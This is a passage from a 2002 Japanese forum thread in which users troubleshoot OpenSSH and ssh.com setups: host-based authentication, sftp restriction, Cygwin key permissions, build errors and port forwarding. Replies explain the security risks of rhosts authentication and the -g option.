Protocol 1
RhostsAuthentication yes
としています。
バージョンはサーバが3.4pでクライアントが3.5p ともにlinuxです。
足りない設定とかあるんでしょうか。

ちなみにプロトコル2では、HostbasedAuthentication では認証ができました。


404 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/14 20:04
hosts.equivなんか使ったら、ssh使う意味ないんでない。


405 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/15 00:18
>>403
/etc/ssh/ssh_known_hosts にクライアントホストの
公開鍵(っていうんだっけ?)は登録してる?
ssh でクライアントにはじめてアクセスするときに
.ssh/known_hosts に蓄えられるやつ。

あと、クライアントの /usr/bin/ssh が suid root
されてないとダメ。

406 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/15 02:16
>>403
RhostsAuthenticationは公開鍵による認証が行なわれないので
使ってはいけない。
プロトコル2のHostbasedAuthenticationと同じなのは
RhostsRSAAuthenticationのほう。

407 名前:405 投稿日:02/11/15 04:31
RhostsRSAAuthenticationだと勘違いしてた。ゴメン。
RhostsAuthenticationならssh_known_hostsはいらない。

ただ >>406 の言う通りRhostsRSAAuthenticationを使う方がいい。

408 名前:403 投稿日:02/11/15 07:20
RhostsRSAAuthenticationは公開鍵認証が必要なため、
hosts.equivだけの認証を使いたかったので
プロトコル1のRhostsAuthenticationを選択したのですが…

RhostsAuthenticationでも/usr/bin/sshがsuidされていないと
ダメなんでしょうか

409 名前:405 投稿日:02/11/15 12:28
>>408
やったことないからしらない。スマン。
でもたぶんsuidされてないとダメだとおもうよ。
sshd はRhostsAuthenticationする場合、
特権portからの接続しか受け付けないから。

ところで、危険を承知で公開鍵認証したくない
シチュエーションってどんなの?

410 名前:名無しさん@お腹いっぱい。 投稿日:02/11/15 13:14
お知恵を拝借。
sftpするとcdコマンドで上位ディレクトリに移動できたりしますよね。
ProFTPやwu-FTPであれば、設定によりユーザはホームディレクトリから上位には行けないようにできますが、sftpではそのような設定は可能ですか?

あるいは、sshコマンドでの接続は全ユーザに許可するが、sftpコマンドでの接続は管理者だけに制限するとか、そんな設定って可能ですか?


411 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/15 13:23
http://www.pizzashack.org/rssh/index.shtml

412 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/15 14:08
chroot patchってどうして削られちゃったんだろうな…

413 名前:!= 403 メール:sage 投稿日:02/11/15 16:11
>>409
ユーザがドキュソな場合。

414 名前:名無しさん@お腹いっぱい。 投稿日:02/11/15 22:41
411のrsshってsftpは許すけど、sshは制限するものですよね。たぶん(英語がにが。。)
ちょっとちがう。
412のchroot patchは。もうダメポ?


415 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/15 22:47
chmod o-x /usr/libexec/sftp-server
とか。

chroot patch なら unofficial なものがどっかにあったはず。
OpenBSD 版じゃなくて p のほうへの patch です。
(しかたないので自分で書いたのを使ってます)


416 名前:403 メール:sage 投稿日:02/11/15 23:41
>>409
ファイアーウォール内の計算サーバにアクセスする
バックエンド計算ホスト100台超からの認証。ただしrコマンド不可
こんなところです(^^;

417 名前:名無しさん@お腹いっぱい。 投稿日:02/11/16 03:57
FreeBSD 4.7R から Cygwin sshd に接続しようとしています。
公開鍵を Cygwin 上の ~/.ssh/authorized_keys に入れて

ssh -2 192.168.0.3

するとパスワードを聞かれます。
公開鍵で認証したいのですが何故パスフレーズを聞かれないのでしょうか?

ssh -2 -v 192.168.0.3

OpenSSH_3.4p1 FreeBSD-20020702, SSH protocols 1.5/2.0, OpenSSL 0x0090607f
Pseudo-terminal will not be allocated because stdin is not a terminal.
debug1: Reading configuration data /home/mona/.ssh/config
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Rhosts Authentication disabled, originating port will not be trusted.
debug1: ssh_connect: needpriv 0
debug1: Connecting to 192.168.0.3 [192.168.0.3] port 22.
debug1: Connection established.
debug1: identity file /home/mona/.ssh/id_rsa type -1
debug1: identity file /home/mona/.ssh/id_dsa type 2
debug1: Remote protocol version 1.99, remote software version OpenSSH_3.5p1
debug1: match: OpenSSH_3.5p1 pat OpenSSH*
Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_3.4p1 FreeBSD-20020702
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: server->client aes128-cbc hmac-md5 none
debug1: kex: client->server aes128-cbc hmac-md5 none
debug1: SSH2_MSG_KEX_DH_GEX_REQUEST sent
debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP


418 名前:名無しさん@お腹いっぱい。 投稿日:02/11/16 03:59
debug1: dh_gen_key: priv key bits set: 135/256
debug1: bits set: 1599/3191
debug1: SSH2_MSG_KEX_DH_GEX_INIT sent
debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY
debug1: Host '192.168.0.3' is known and matches the DSA host key.
debug1: Found key in /home/mona/.ssh/known_hosts:1
debug1: bits set: 1566/3191
debug1: ssh_dss_verify: signature correct
debug1: kex_derive_keys
debug1: newkeys: mode 1
debug1: SSH2_MSG_NEWKEYS sent
debug1: waiting for SSH2_MSG_NEWKEYS
debug1: newkeys: mode 0
debug1: SSH2_MSG_NEWKEYS received
debug1: done: ssh_kex2.
debug1: send SSH2_MSG_SERVICE_REQUEST
debug1: service_accept: ssh-userauth
debug1: got SSH2_MSG_SERVICE_ACCEPT
debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: next auth method to try is publickey
debug1: try privkey: /home/mona/.ssh/id_rsa
debug1: try pubkey: /home/mona/.ssh/id_dsa
debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: next auth method to try is keyboard-interactive
debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: next auth method to try is password
debug1: authentications that can continue: publickey,password,keyboard-interactive


419 名前:名無しさん@お腹いっぱい。 投稿日:02/11/16 04:00
Permission denied, please try again.
debug1: authentications that can continue: publickey,password,keyboard-interactive
Permission denied, please try again.
debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: no more auth methods to try
Permission denied (publickey,password,keyboard-interactive).
debug1: Calling cleanup 0x804bed0(0x0)


----ここまで

publickey を飛ばしてしまっているようなのですが。

420 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/16 05:57
ssh -2 -i {secret key} {hostname}
…でダメ?

421 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/16 06:00
ssh -v -2 -i .ssh/id_dsa 192.168.0.3

してみましたが、やはりパスワードを聞かれました。


debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: next auth method to try is publickey
debug1: try pubkey: .ssh/id_dsa
debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: next auth method to try is keyboard-interactive
debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: next auth method to try is password


422 名前:419=421 メール:sage 投稿日:02/11/16 06:10
接続先の ~/.ssh は 700 ~/.ssh/authorized_keys は 600 になっています。


423 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/16 15:17
ttp://chrootssh.sourceforge.net/
がありました。情報さんくす。


424 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/16 19:47
>>422
サーバー側は何と言ってる? sshd -d で試したログ希望。

425 名前:名無しさん@お腹いっぱい。 投稿日:02/11/17 11:51
openssh-3.5p1 + openssl-0.9.6cでコンパイルしようとすると

configure: error: OpenSSL version header not found.

などといわれます。コンパイル環境は「Openblocks S」とredhat5.2です。
両方とも同じエラーが出るので困ってます。

ちなみにopensslは通常ユーザーのディレクトリにsslという
ディレクトリを作成して

./config --prefix=~user1/ssl shared

などとしてコンパイルしています。

426 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/17 13:29
>>425
configureスクリプトがインストールされているOpenSSLを見つけられないから
中断しちまったんだろ。OpenSSLがインストールされているディレクトリを
指定すればいいよ:
% ./configure --with-ssl-dir=[PATH]


ってかOpenSSHのマニュアル読めっつーの。

あとOpenSSLは最新版0.9.6gを使うようにな。セキュリティ上の問題がfixされてるから。

427 名前:名無しさん@お腹いっぱい。 投稿日:02/11/17 14:52
0.9.6gの間違いでした。「./configure --with-ssl-dir…」の方は
ちゃんと指定してました。

gnuのfileutilsを入れなおしたり、gccのバージョンをあげているうちに問題
は自然に解決しました(redhat5.2のみ)。あとはopenblocksの方を
なんとかすれば…

428 名前:419 投稿日:02/11/17 17:34
sshd -d してみました。長くなるので関係ありそう部分を。
なんで port 1349 を使っているんだ?

debug1: SSH2_MSG_NEWKEYS received
debug1: KEX done
debug1: userauth-request for user mona service ssh-connection method none
debug1: attempt 0 failures 0
Failed none for mona from 192.168.0.2 port 1349 ssh2
debug1: userauth-request for user mona service ssh-connection method publickey
debug1: attempt 1 failures 1
debug1: test whether pkalg/pkblob are acceptable
Failed none for mona from 192.168.0.2 port 1349 ssh2
debug1: temporarily_use_uid: 1000/513 (e=18/544)
debug1: trying public key file /home/mona/.ssh/authorized_keys
debug1: restore_uid: (unprivileged)
debug1: temporarily_use_uid: 1000/513 (e=18/544)
debug1: trying public key file /home/mona/.ssh/authorized_keys2
debug1: restore_uid: (unprivileged)
Failed publickey for mona from 192.168.0.2 port 1349 ssh2
debug1: userauth-request for user mona service ssh-connection method keyboard-interactive
debug1: attempt 2 failures 2
debug1: keyboard-interactive devs
debug1: auth2_challenge: user=mona devs=
debug1: kbdint_alloc: devices ''
Failed keyboard-interactive for mona from 192.168.0.2 port 1349 ssh2
debug1: userauth-request for user mona service ssh-connection method password
debug1: attempt 3 failures 3
Accepted password for mona from 192.168.0.2 port 1349 ssh2

429 名前:hdk メール:sage 投稿日:02/11/17 18:54
>>428 419 さん
~/.ssh/authorized_keys のアクセス許可を、
ユーザ SYSTEM が読めるように変更するとうまくいくとおもいます。
Cygwin でファイルの許可モードを 600 にしてしまうと、
SYSTEM に対するアクセス許可のエントリがなくなってしまうようです。

430 名前:406 メール:sage 投稿日:02/11/17 20:17
>>403
> RhostsRSAAuthenticationは公開鍵認証が必要なため、
> hosts.equivだけの認証を使いたかったので
> プロトコル1のRhostsAuthenticationを選択したのですが…

> ファイアーウォール内の計算サーバにアクセスする
> バックエンド計算ホスト100台超からの認証。ただしrコマンド不可
> こんなところです(^^;

単にknown_hostsファイルを作るのが面倒なだけか?
だったら、ssh-keyscanを使えばよろし。
# ssh-keyscan -t dsa -f /etc/ssh/shosts.equiv > /etc/ssh/ssh_known_hosts

431 名前:419 メール:sage 投稿日:02/11/17 20:40
>>429
本当だ…。前に Unix 同士でこのパーミッションが 644 になってたから
失敗したから気をつけていたら、それが仇になるとは…。

ありがとうございました。

432 名前:403 メール:age 投稿日:02/11/19 19:22
>>430
ssh-keyscanは知りませんでした。勉強になります。

>単にknown_hostsファイルを作るのが面倒なだけか?
ではなくて、100台超のマシンから一斉に繰り返しsshでアクセスしてると
sshdが反応しなくなってしまうので、RSA認証を省けばこの問題がクリアできるかと
思ったのですが。


433 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/19 19:33
>>432
tty (だっけ?) の数が足りてないんでないの?

434 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/19 22:08
>>432
もしくはsshd_configのMaxStartupsをいじるとか。

435 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/19 22:11
>>432
どうやって RSA 認証の問題だってわかったの?

436 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/19 22:37
>435
明確な根拠があるようならばこんなところで聞いていないと思われ

437 名前:62 投稿日:02/11/21 19:57
外出先のラップトップPC(win)のファイルを自宅のサーバー(linux, DDNS 利用)にインターネット経由で定期的にバックアップしたいと思っています。
cygwin をつかって、

1.rsync を ssh 経由で利用する
http://www2.i-e-c.co.jp/ssh6.html

2.これを cron でまわす
http://pcweb.mycom.co.jp/special/2002/cygwin/09.html

でできそうな気がするんですが、問題はパスワード入力です。
ssh-agent を立てればノーパスワードで可能、
と言うことなのですが、よくわかりません。
どうしたらいいか教えてください。


438 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/21 19:59
>>437
> どうしたらいいか教えてください。
ぐぐる。

439 名前:403 メール:age 投稿日:02/11/21 20:12
>>435
ログを見るとlibpwdb.so.0が開けなくてこけているらしいので、
とりあえずホスト名だけの認証にすればいいのかなと思った次第です。
特にRSAって分ったわけではないですね…(^^;

440 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/22 00:04
>>437
パスフレーズなしの公開鍵認証を使う。

ここも参考にすれ。
http://www.jp.FreeBSD.org/QandA/HTML/2255.html

441 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/22 04:27
>>403
soが開けないって、1台から接続したときはきちんと動いてるんだよね?
だとするとファイルの開きすぎとか。

そしてなぜr系コマンド不可?
High Performance Computingを甘くみすぎてないか?
そもそも100台からいっせいに1台へ接続なんてHPCクラスタでも普通やらない。

http://ganglia.sourceforge.net/
のpre-2.5.0に入ってるgexec+authdならRSA認証で1000ノード以上でも大丈夫・・・らしい。
モニタリングの方しかいじったことないからよく知らないけど。

442 名前:  メール:  投稿日:02/11/26 23:50
ttp://www.ayera.com/teraterm/
TeraTerm Pro Web 3.1.1 - Enhanced Telnet/SSH2 Client

不安定じゃありませんか? 日本語処理はさすが TeraTerm と言う感じですが
私の場合、 3000行くらいのファイルを読んだり、貼り付けたりすると毎回のようにフリーズします。
同じような症状の方いらっしゃいませんか?

443 名前:232 メール:sage 投稿日:02/11/27 02:36
>>442
漏れと同じような現象かな?

444 名前:名無しさん@お腹いっぱい。 投稿日:02/12/04 18:44
>>442
が〜ん、公開鍵暗号による認証ができないじゃないかよぅ。グスン

445 名前:名無しさん@お腹いっぱい。 投稿日:02/12/04 19:31
ssh.com版がいつのまにか3.2.2になってた。


446 名前:初期不良 メール:sage 投稿日:02/12/05 00:20
>>444
pagent.exe から取ってきてくれるらしいよ

447 名前:名無しさん@お腹いっぱい。 投稿日:02/12/05 09:07
>>446
あ、それ、PuTTY の話ですね。

PuTTY also includes pscp.exe, a secure copy program,
plink.exe, a command line interface to PuTTY backends and
pagent.exe, an SSH authentication agent for PuTTY, PSCP and Plink.
It does not include a counterpart for the newer sftp program
that is available on current SSH releases on UNIX systems.

TeraTerm Pro Web じゃ、無理ですか?

448 名前:bloom 投稿日:02/12/05 09:10

http://www.agemasukudasai.com/bloom/

449 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/06 02:24
>447
唐突にPuTTYの話を持ち出すわけ無いだろ・・・

450 名前:名無しさん@お腹いっぱい。 投稿日:02/12/09 18:13
Authenticated with partial success.
Permission denied ().

と言われてログインできなくなってしまったんですけど、
どうすれば解決できるでしょうか?

ちなみにクライアントは linux の ssh で version 3.4 です。
windows の teraterm + ttssh からはログインできるんですけど。

一介の一般ユーザなのでサーバのほうはいじれません。


451 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/09 18:16
-v

452 名前:名無しさん@お腹いっぱい。 投稿日:02/12/09 18:29
すんません。長いけど貼っつけます。

$ ssh -v xxx.xxx.ac.jp
OpenSSH_3.4p1 Debian 1:3.4p1-1, SSH protocols 1.5/2.0, OpenSSL 0x0090603f
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Rhosts Authentication disabled, originating port will not be trusted.
debug1: ssh_connect: needpriv 0
debug1: Connecting to xxx.xxx.ac.jp [xx.xx.xx.xx] port 22.
debug1: Connection established.
debug1: identity file /home/hoge/.ssh/identity type 0
debug1: identity file /home/hoge/.ssh/id_rsa type 1
debug1: identity file /home/hoge/.ssh/id_dsa type -1
debug1: Remote protocol version 1.99, remote software version 2.0.13 (non-commercial)
debug1: match: 2.0.13 (non-commercial) pat 2.0.13*,2.0.14*,2.0.15*,2.0.16*,2.0.17*,2.0.18*,2.0.19*
Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: server->client 3des-cbc hmac-md5 none
debug1: kex: client->server 3des-cbc hmac-md5 none
debug1: dh_gen_key: priv key bits set: 187/384
debug1: bits set: 557/1024
debug1: sending SSH2_MSG_KEXDH_INIT
debug1: expecting SSH2_MSG_KEXDH_REPLY


453 名前:名無しさん@お腹いっぱい。 投稿日:02/12/09 18:30
つづきです。

debug1: Host 'xxx.xxx.ac.jp' is known and matches the DSA host key.
debug1: Found key in /home/hoge/.ssh/known_hosts:33
debug1: bits set: 496/1024
debug1: ssh_dss_verify: signature correct
debug1: kex_derive_keys
debug1: newkeys: mode 1
debug1: SSH2_MSG_NEWKEYS sent
debug1: waiting for SSH2_MSG_NEWKEYS
debug1: newkeys: mode 0
debug1: SSH2_MSG_NEWKEYS received
debug1: done: ssh_kex2.
debug1: send SSH2_MSG_SERVICE_REQUEST
debug1: buggy server: service_accept w/o service
debug1: got SSH2_MSG_SERVICE_ACCEPT
debug1: authentications that can continue:
debug1: next auth method to try is publickey
debug1: try pubkey: /home/hoge/.ssh/id_rsa
debug1: authentications that can continue:
debug1: try privkey: /home/hoge/.ssh/id_dsa
debug1: next auth method to try is keyboard-interactive
debug1: authentications that can continue:
debug1: next auth method to try is password


454 名前:名無しさん@お腹いっぱい。 投稿日:02/12/09 18:31
最後の入力部分です。

Authenticated with partial success.
debug1: authentications that can continue:
Permission denied, please try again.
Authenticated with partial success.
debug1: authentications that can continue:
Permission denied, please try again.
Authenticated with partial success.
debug1: authentications that can continue:
debug1: no more auth methods to try
Permission denied ().
debug1: Calling cleanup 0x8063a9c(0x0)


455 名前:初期不良 メール:sage 投稿日:02/12/09 21:42
>>447
なんか反応がなくて不安なので念のため書いておくと、
TeraTerm3 が pagent.exe から秘密鍵持ってきてくれまつ

456 名前:名無しさん@Meadow メール:sage 投稿日:02/12/09 23:45
>>455
s/pagent/pageant/
ですよね?


457 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/10 03:19
>456
> s/pagent/pageant/
> ですよね?

(゚Д゚)ハァ?

458 名前:450=452 メール:sage 投稿日:02/12/10 13:28
ssh -1 で繋がりました。原因は不明なのですが、
fwが protocol 2 に対応していないとか、
そんなところでしょうか。
うーん、悩ましい…
ちなみに、scp -1 ではまだエラーが出るんです…


459 名前:名無しさん@XEmacs メール:sage 投稿日:02/12/10 14:18
>>458
> ssh -1 で繋がりました。

ttssh で繋がるならそうでしょう。そもそも Authenticated with
partial success.というメッセージが出るのは protocol 2 だけなの
で。ちなみに、このメッセージは sshd2_config で requiredAuthentications
に複数の method が指定されている場合、そのうちの一つに成功した
(かつまだ他に受けるべき method が残っている) ときに出ます。

> 原因は不明なのですが、
> fwが protocol 2 に対応していないとか、
> そんなところでしょうか。

いや、間違いなく sshd2 と会話が出来ているのでそういう問題ではな
いと思う。サーバはいじれないってことだけど、

>>debug1: Remote protocol version 1.99, remote software version 2.0.13 (non-commercial)
>>debug1: buggy server: service_accept w/o service
>>debug1: authentications that can continue:

バージョンが古いし、buggy server なんて言われてるし、使える
authentication method のリストは出てないし、と、サーバ側が怪し
いところだらけなので、そっちの問題じゃないかいな。まぁ、
protocol 1 で我慢できるならそれでもよいか。

> ちなみに、scp -1 ではまだエラーが出るんです…

ちなみに、scp には -1 ってオプションはない。だもんで、scp では
-o オプションで渡すか、もしくは ssh_config で設定するか、なん
だわな。


460 名前:450=452=458 投稿日:02/12/10 17:26
>>459
> いや、間違いなく sshd2 と会話が出来ているのでそういう問題ではな
> いと思う。

たしかにそうなんですが、たとえばYahoo!BBからアクセスするときは
protocol 2 でも何の問題もないんです。ところが、会社内部からだと前記の
問題が出るんです。だもんで会社のfwの問題なのかと。

> ちなみに、scp には -1 ってオプションはない。だもんで、scp では

うーん、man には
-1 Forces scp to try protocol version 1 only.
とあるんですけど…

ちなみに、scp -1 を実行すると、パスワードは受け付けてくれるのですが、
warning: Executing scp1 compatibility.
Executing ssh1 in compatibility mode failed.
で終ってしまいます。


461 名前:名無しさん@XEmacs メール:sage 投稿日:02/12/10 18:17
>>460
> たしかにそうなんですが、たとえばYahoo!BBからアクセスするときは
> protocol 2 でも何の問題もないんです。ところが、会社内部からだと前記の
> 問題が出るんです。だもんで会社のfwの問題なのかと。

たしかに変な挙動ですが、firewall が関係してるとも思えないなぁ。
Yahoo!BB から使うときと会社から使うときで client の環境は一緒な
の?

> うーん、man には
> -1 Forces scp to try protocol version 1 only.
> とあるんですけど…

そりは ssh.com 版の scp じゃないすか。

> warning: Executing scp1 compatibility.
> Executing ssh1 in compatibility mode failed.

というのも ssh.com 版の挙動っぽいし。だとすると、

>>450
> ちなみにクライアントは linux の ssh で version 3.4 です。

と言ってたのと矛盾してるんで、なんか client の環境も変かも。ど
のバージョンの ssh/scp が使われているのか確かめるべし。


462 名前:名無しさん@お腹いっぱい。 投稿日:02/12/10 18:31
>>461
> Yahoo!BB から使うときと会社から使うときで client の環境は一緒な
> の?

まったく一緒です。ただ、Yahoo!BBではDHCPですが、会社では固定IPです。

> そりは ssh.com 版の scp じゃないすか。

> と言ってたのと矛盾してるんで、なんか client の環境も変かも。ど
> のバージョンの ssh/scp が使われているのか確かめるべし。

Debian で ssh package を入れたんですけど…

$ ssh -V
OpenSSH_3.4p1 Debian 1:3.4p1-1, SSH protocols 1.5/2.0, OpenSSL 0x0090603f

scp も同じ ssh package に付属するやつです。version の確認方法がわかり
ませんが。


463 名前:名無しさん@XEmacs メール:sage 投稿日:02/12/10 20:00
>>462
> Debian で ssh package を入れたんですけど…

debian の openssh patch を見てみたら、たしかに scp が -[12] オ
プションを受け付けるように修正されるのね。うーむ、そんなことま
でやってくれやがるのか、debian は。

> scp も同じ ssh package に付属するやつです。version の確認方法がわかり
> ませんが。

scp -v とかで実際に動かしてみればある程度分かる。しかし、

>>461
> > warning: Executing scp1 compatibility.
> > Executing ssh1 in compatibility mode failed.

というような変更までは debian の patch もやってないしなぁ。とか
書いてたら気がついた。scp を起動すると、サーバ側でも scp プログ
ラムを呼ぶようになってるんで、こいつはサーバ側の ssh.com 版
scp が出してるメッセージって可能性はあるか。

だとすればやっぱサーバ側に手を入れてもらわないとどうしようもな
さそう。


464 名前:名無しさん@お腹いっぱい。 投稿日:02/12/10 20:31
> >>462
> だとすればやっぱサーバ側に手を入れてもらわないとどうしようもな

サーバ側の /etc/sshd_config なら見ることができます。文句も言えるとは思
うんですが何て言えばいいですかね? (もうほぼ部外の人間なのでそう簡単
に対処してくれるとは思えませんけれど)


465 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/10 22:59
>>464
>>450には
| Authenticated with partial success.
| Permission denied ().
| と言われてログインできなくなってしまったんですけど、
| どうすれば解決できるでしょうか?

と書いてあるますが、以前はできてたんですか?
だとすれば、それからいままでの間のserver/client双方の変更を
元に戻すことは可能ですか?


466 名前:464 投稿日:02/12/10 23:11
>>465
> 以前はできてたんですか?

できてました。というか、今でも会社以外からはできています。

> だとすれば、それからいままでの間のserver/client双方の変更を
> 元に戻すことは可能ですか?

サーバはいじれないからわからないですが、クライアントの ssh 関係はいじっ
てません。問題は設定の変更ではなくてネットワーク環境の変化だと思います。


467 名前:464 投稿日:02/12/10 23:16
>>463
> こいつはサーバ側の ssh.com 版 scp が出してるメッセージって可能性はあるか。

サーバで man ssh したらこんなん出ました。
AUTHORS SSH Communications Security Ltd. For more information, see
http://www.ssh.fi.

> ssh -V
ssh: SSH Version 2.0.13


468 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/10 23:23
会社のfwでモニタされてるとか。サーバキーチェックした?

469 名前:名無しさん@XEmacs メール:sage 投稿日:02/12/10 23:24
>>464
> サーバ側の /etc/sshd_config なら見ることができます。文句も言えるとは思
> うんですが何て言えばいいですかね?

OpenSSH 入れろや(゚Д゚)ゴルァ。

ssh.com 版のままでも、新しいの (3.X) に変えれば直るんじゃないか
とは思うけど。

ただ、ssh.com に protocol 1 をサポートさせるためには 1.2.X もイ
ンストールしなきゃならない。


470 名前:464 投稿日:02/12/10 23:50
>>468
> 会社のfwでモニタされてるとか。サーバキーチェックした?

やっぱfw関係ありますか? サーバキーのチェック方法がわかりません。
できれば会社のネットワーク管理者にはあまり関わりあいたくないのですが。


471 名前:名無しさん@お腹いっぱい。 投稿日:02/12/14 18:35
UDPをフォワーディングしたいんですが、どっかにパッチないですか?

472 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/14 19:03
>>471
netcatで。


473 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/14 20:03
なるほど。TCPの重さを嫌ったんだけど両端で変換しちまえばいいのか…
つかsshチャンネル上をTCPがそのまま通るわけじゃないから余計な心配だったようです。
経験値アップしました。サンクス

474 名前:名無しさん@お腹いっぱい。 投稿日:02/12/16 12:52
皆さんは公開鍵を、どうやってホストへ登録してもらってますか?

ホスト側では
PasswordAuthentication no
ChallengeResponseAuthentication no
となっています。


475 名前:名無しさん@お腹いっぱい。 投稿日:02/12/16 16:34
教えて君でスマン。
sshで別の計算機にログインしたとき
現在の計算機のカレントディレクトリを保持したままログインするには
どうすればいいですか?

476 名前:名無しさん@XEmacs メール:sage 投稿日:02/12/16 17:38
>>475
> sshで別の計算機にログインしたとき
> 現在の計算機のカレントディレクトリを保持したままログインするには

『カレントディレクトリを保持したまま』の意味がいまいちよくつか
めないんだけど、local と同じ path が remote にもあってそこに
cd した上で作業したいってことかしら?

だとすれば、

$ ssh -t remote "cd `pwd`; /path/to/loginshell/in/remote"

なんて手はある。shell の path も両マシンで共通なら

$ ssh -t remote "cd `pwd`; $SHELL"

でも可。


477 名前:475 投稿日:02/12/16 19:09
できました。
教えてくれてどうもです。

478 名前:名無しさん@お腹いっぱい。 投稿日:02/12/17 16:24
PuTTYのスレで知ったのだけど、SSHv2に脆弱性が発見されているね。
CERTとrapid7の発表とで、脆弱性の影響を受けるバージョンが違うんだけど...。

ssh-3.2.2がアウトだと、入れ替え相当面倒くさいなぁ・・・。


479 名前:名無しさん@お腹いっぱい。 投稿日:02/12/17 21:19
OpenSSHはセーフだったか

480 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/18 02:32
やっぱりssh-3.2.2アウトらすぃ。鬱だ...。

481 名前:名無しさん@お腹いっぱい。 投稿日:02/12/19 14:28
http://www.ssh.com/company/newsroom/article/303/
ssh.com はDoS以外、大丈夫とのアナウンスが出た。
CERTも18日付けで更新されている。


482 名前:名無しさん@お腹いっぱい。 投稿日:02/12/23 16:58
ポートフォワーディングして、telnetでlocahostのそのポートにアクセスしよ
うとすると、

channel 2: open failed: connect failed: Connection refused

というエラーで終了してしまうんですけど、どうやったらアクセスできるよう
になるでしょうか? 具体的にはfirewallを越えてPOPのフォワーディングを
しようとしています。


483 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/23 17:37
>>482
port forward するときのコマンドライン晒せや。

484 名前:482 投稿日:02/12/23 18:20
XXXからYYYを介してpopサーバへの接続を試みています。

XXX$ ssh localhost -L 20110:YYY.YY.YY.jp:10110

一方、YYYでは

YYY$ ssh localhost -L 10110:pop.YY.YY.jp:110

としています。YYYからは

YYY$ telnet localhost 10110

でpopサーバとお話できるんですけど、XXXからだと

XXX$ telnet localhost 20110

はすぐにクローズされてしまいます。


485 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/23 18:43
>>484
なぜlocalhostにログインしてるの?
local-firewall-server
の形でforwardしたいなら
lcoal$ ssh firewall -L 10110:server:110
じゃないの?

>>484の方法でやるなら -g オプションが必要だけど、
セキュリティホールになりうるからお勧めできない。

486 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/23 18:46
ああ、全経路を暗号化したいのか。
なら

local$ ssh firewall -L 20110:server:10110

firewall$ ssh server -L 10110:server:110

かな。

487 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/23 18:46
違った。

local$ ssh firewall -L 20110:firewall:10110
firewall$ ssh server -L 10110:server:110


488 名前:482 投稿日:02/12/23 19:17
いちおうあの方法は管理者側の指示のようです。
popserverにはメール・アカウントしかないようでして、

firewall$ ssh server -L 10110:server:110

ではログインできません。


489 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/23 19:25
>>488
管理者がナニ考えているのか知らないけど、
>>484じゃlocal-firewall間が暗号化されていないよ。ssh使う意味無し。

serverにログインアカウント無いなら>>485を試してみて。
(ただし、この方法はfirewall-server間は暗号化されない)

490 名前:482 投稿日:02/12/23 21:48
>>489
-gで繋がりました。ありがとうございました。

後学のために、この-gがないと繋がらない理由と、これがセキュリティホール
になる仕組みを教えていただけると嬉しいです。


491 名前:名無しさん@お腹いっぱい。 投稿日:02/12/23 21:57

もうちょっとでクリスマス。。★彡
パートナーは見つかりました?(o^.^o)

http://petitmomo.com/mm/
ここがちょっぴりエッチ系のめぐが運営している出会いサイトです。
もしよかったら使ってみて、、、
ヨロシクです。

めぐ(^o^)-☆


492 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/23 22:05
>>490
マニュアル嫁。それでわからんかったら -g 使うの禁止。

493 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/24 01:04
>>490
-g オプション無しだと port forward で listen した port は localhost しか接続を許可しない。
>>484で外からアクセスして弾かれているので分かる。

-g オプションつけると port forward で listen した port への接続を無差別に許可する。
せっかく管理者がサーバーを firewall 内においているのに、外からアクセスする手段を与えてしまう。
悪意のある人がこれに気づくと DoS 程度は容易に行えるし、
管理者がサーバーソフトのアップデートを怠っていると最悪の場合 crack される可能性がある。

なので、 -g オプションの動作がよくわかっていなければ使ってはならない。
-g 付けるほうじゃなく、こっちを試してみて。
local$ ssh firewall -L 10110:server:110


494 名前:482 投稿日:02/12/24 01:18
>>493
